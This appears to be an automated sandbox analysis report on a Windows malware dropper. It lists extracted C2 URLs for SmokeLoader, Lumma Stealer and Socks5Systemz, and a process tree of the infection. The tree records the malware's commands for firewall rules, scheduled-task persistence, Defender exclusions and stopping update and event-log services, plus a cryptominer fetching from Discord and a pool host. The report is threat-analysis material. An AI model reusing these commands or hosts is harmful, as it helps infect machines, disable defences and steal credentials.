Resubmissions

22-08-2024 15:33

240822-sy6bqsvbng 7

10-03-2024 16:21

240310-ttpc4aga89 10

10-03-2024 12:34

240310-prvpwacf93 10

Analysis

  • max time kernel
    453s
  • max time network
    681s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-03-2024 16:21

General

  • Target

    file.exe

  • Size

    2.4MB

  • MD5

    b11c3fad2e48022f58635df7368d6441

  • SHA1

    63883fee892ac1e0d44f568913931c0d59b343d1

  • SHA256

    2a362d6d3bceaf1159bc245499a778f1ab9c229c3cbd4be4c63a582a716a4c80

  • SHA512

    6c68523b259c307e1c4ff4c6809fb20e5d9d9998a32d03ca06eaf29ec8f27bcaca2cafd9b57420b307160b3ebfeac16d234b99f6119f8f3038f4b5bf4b169023

  • SSDEEP

    49152:jCqqfqaaK++EFUw2PsQMIZnLzn8FGaqxMBeVBBzKl:jONGXqGY1y

Malware Config

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

smokeloader

Version

2022

C2

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32
rc4.i32

Extracted

Family

lumma

C2

https://wisemassiveharmonious.shop/api

https://colorfulequalugliess.shop/api

https://relevantvoicelesskw.shop/api

https://associationokeo.shop/api

https://resergvearyinitiani.shop/api

Extracted

Family

socks5systemz

C2

http://aiueiup.ru/search/?q=67e28dd83a5da32a155afd1b7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978a271ea771795af8e05c644db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608fff11c8e7949f3d

http://aibukfn.ru/search/?q=67e28dd83a5da32a155afd1b7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978a271ea771795af8e05c644db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608fff11c8e7949f3d

Signatures

  • DcRat 14 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 3 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socks5Systemz

    Socks5Systemz is a botnet written in C++.

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 14 IoCs
  • Executes dropped EXE 48 IoCs
  • Loads dropped DLL 21 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 21 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unexpected DNS network traffic destination 2 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 6 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 27 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • NSIS installer 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 44 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
      2⤵
        PID:5084
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
        2⤵
          PID:1600
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        1⤵
        • DcRat
        • Loads dropped DLL
        • Checks SCSI registry key(s)
        • Checks processor information in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2428
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4120 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:456
        • C:\Windows\System32\rundll32.exe
          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          1⤵
            PID:5300
          • C:\Users\Admin\AppData\Local\Temp\file.exe
            "C:\Users\Admin\AppData\Local\Temp\file.exe"
            1⤵
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:5652
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
              2⤵
              • DcRat
              • Drops startup file
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5724
              • C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe
                "C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:6140
                • C:\Users\Admin\AppData\Local\Temp\is-3Q3V6.tmp\jVcQfTbmL2u1ousPu7tmRClP.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-3Q3V6.tmp\jVcQfTbmL2u1ousPu7tmRClP.tmp" /SL5="$203F8,1697450,56832,C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe"
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1052
                  • C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
                    "C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i
                    5⤵
                    • Executes dropped EXE
                    PID:5480
                  • C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
                    "C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s
                    5⤵
                    • Executes dropped EXE
                    PID:1592
              • C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe
                "C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5132
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  4⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5148
                • C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe
                  "C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe"
                  4⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Checks for VirtualBox DLLs, possible anti-VM trick
                  • Drops file in Windows directory
                  • Modifies data under HKEY_USERS
                  PID:1756
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    5⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5300
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                    5⤵
                      PID:2136
                      • C:\Windows\system32\netsh.exe
                        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                        6⤵
                        • Modifies Windows Firewall
                        PID:1108
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      5⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:2592
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      5⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:3328
                    • C:\Windows\rss\csrss.exe
                      C:\Windows\rss\csrss.exe
                      5⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Manipulates WinMonFS driver.
                      • Drops file in Windows directory
                      PID:5536
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        6⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        PID:6076
                      • C:\Windows\SYSTEM32\schtasks.exe
                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                        6⤵
                        • DcRat
                        • Creates scheduled task(s)
                        PID:4508
                      • C:\Windows\SYSTEM32\schtasks.exe
                        schtasks /delete /tn ScheduledUpdate /f
                        6⤵
                          PID:2136
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          6⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          PID:5468
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          6⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          PID:2892
                        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                          C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                          6⤵
                          • Executes dropped EXE
                          PID:5904
                        • C:\Windows\SYSTEM32\schtasks.exe
                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                          6⤵
                          • DcRat
                          • Creates scheduled task(s)
                          PID:1892
                        • C:\Windows\windefender.exe
                          "C:\Windows\windefender.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:5388
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                            7⤵
                              PID:6124
                              • C:\Windows\SysWOW64\sc.exe
                                sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                8⤵
                                • Launches sc.exe
                                PID:1864
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                              PID:2444
                            • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                              C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                              6⤵
                                PID:5432
                                • C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
                                  C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --tls --nicehash -o showlock.net:443 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --tls --nicehash -o showlock.net:80 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --nicehash --http-port 3433 --http-access-token f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --randomx-wrmsr=-1
                                  7⤵
                                    PID:1820
                                  • C:\Windows\rss\csrss.exe
                                    C:\Windows\rss\csrss.exe -hide 1820
                                    7⤵
                                      PID:1192
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        8⤵
                                          PID:5240
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      6⤵
                                        PID:1840
                                      • C:\Windows\SYSTEM32\schtasks.exe
                                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                        6⤵
                                        • DcRat
                                        • Creates scheduled task(s)
                                        PID:336
                                      • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                        C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                        6⤵
                                          PID:5356
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -nologo -noprofile
                                          6⤵
                                            PID:5032
                                          • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                                            C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                                            6⤵
                                              PID:2740
                                      • C:\Users\Admin\Pictures\vn0dZ1KknFaoEqIsGOGNDVH5.exe
                                        "C:\Users\Admin\Pictures\vn0dZ1KknFaoEqIsGOGNDVH5.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: MapViewOfSection
                                        PID:5168
                                      • C:\Users\Admin\Pictures\6VC6yCs5XvpI0RU46xUTlGFH.exe
                                        "C:\Users\Admin\Pictures\6VC6yCs5XvpI0RU46xUTlGFH.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of WriteProcessMemory
                                        PID:392
                                        • C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                                          C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                                          4⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Checks processor information in registry
                                          PID:5388
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 3320
                                            5⤵
                                            • Program crash
                                            PID:5220
                                        • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                                          C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                                          4⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          • Suspicious use of WriteProcessMemory
                                          PID:4752
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                                            5⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:1660
                                            • C:\Windows\SysWOW64\chcp.com
                                              chcp 1251
                                              6⤵
                                                PID:3720
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                                6⤵
                                                • DcRat
                                                • Creates scheduled task(s)
                                                PID:3148
                                        • C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe
                                          "C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --silent --allusers=0
                                          3⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Enumerates connected drives
                                          • Modifies system certificate store
                                          • Suspicious use of WriteProcessMemory
                                          PID:5344
                                          • C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe
                                            C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x6e7f21c8,0x6e7f21d4,0x6e7f21e0
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:512
                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tJ6HSphWPkDhrW4fuBx7FKRM.exe
                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --version
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:1752
                                          • C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe
                                            "C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5344 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240310162828" --session-guid=212f66a5-7f1b-448e-b906-6cdefc4c9881 --server-tracking-blob=MjUwNDNlOGVhNjM1NmY4OTkyNzdjZTEwNGEwODhmZGRjODEwMDM2ODY5YjI5ZmU1OGFkZTRiZjVhNTE5MTI0NDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMDA4ODA5MC44NTUyIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIyNWVhMmQwNS1kODE4LTRkZmEtYmQ0MC0yZjVlNjkyYmI4ZGYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=A405000000000000
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Enumerates connected drives
                                            PID:912
                                            • C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe
                                              C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x308,0x30c,0x310,0x2d8,0x314,0x6dce21c8,0x6dce21d4,0x6dce21e0
                                              5⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:3720
                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:4332
                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --version
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:5208
                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
                                              "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x288,0x28c,0x290,0x260,0x294,0x1000040,0x100004c,0x1000058
                                              5⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:5048
                                        • C:\Users\Admin\Pictures\eNjkg8FaEHV29ts9FvoPTUAW.exe
                                          "C:\Users\Admin\Pictures\eNjkg8FaEHV29ts9FvoPTUAW.exe"
                                          3⤵
                                          • Drops file in Drivers directory
                                          • Executes dropped EXE
                                          • Drops file in System32 directory
                                          PID:5576
                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                            4⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1892
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                            4⤵
                                              PID:5156
                                              • C:\Windows\system32\wusa.exe
                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                5⤵
                                                  PID:3712
                                              • C:\Windows\system32\sc.exe
                                                C:\Windows\system32\sc.exe stop UsoSvc
                                                4⤵
                                                • Launches sc.exe
                                                PID:2248
                                              • C:\Windows\system32\sc.exe
                                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                4⤵
                                                • Launches sc.exe
                                                PID:1604
                                              • C:\Windows\system32\sc.exe
                                                C:\Windows\system32\sc.exe stop wuauserv
                                                4⤵
                                                • Launches sc.exe
                                                PID:2596
                                              • C:\Windows\system32\sc.exe
                                                C:\Windows\system32\sc.exe stop bits
                                                4⤵
                                                • Launches sc.exe
                                                PID:6124
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  5⤵
                                                    PID:5480
                                                • C:\Windows\system32\sc.exe
                                                  C:\Windows\system32\sc.exe stop dosvc
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:3268
                                                • C:\Windows\system32\powercfg.exe
                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4564
                                                • C:\Windows\system32\powercfg.exe
                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2140
                                                • C:\Windows\system32\powercfg.exe
                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2364
                                                • C:\Windows\system32\powercfg.exe
                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5140
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    5⤵
                                                      PID:1752
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                    4⤵
                                                    • Launches sc.exe
                                                    PID:456
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                    4⤵
                                                    • Launches sc.exe
                                                    PID:4120
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe stop eventlog
                                                    4⤵
                                                    • Launches sc.exe
                                                    PID:5648
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                    4⤵
                                                    • Launches sc.exe
                                                    PID:4084
                                                • C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe
                                                  "C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:2612
                                                  • C:\Users\Admin\AppData\Local\Temp\is-5M28V.tmp\zauJwzNDKtlWh0Su7sA66DV7.tmp
                                                    "C:\Users\Admin\AppData\Local\Temp\is-5M28V.tmp\zauJwzNDKtlWh0Su7sA66DV7.tmp" /SL5="$1403A2,1697450,56832,C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:4464
                                                    • C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
                                                      "C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:4764
                                                    • C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
                                                      "C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:2516
                                                • C:\Users\Admin\Pictures\p1ZjVvAKBV5XkBUaTd0q2FDb.exe
                                                  "C:\Users\Admin\Pictures\p1ZjVvAKBV5XkBUaTd0q2FDb.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:1588
                                                  • C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                                                    C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:2064
                                                    • C:\Windows\SysWOW64\WerFault.exe
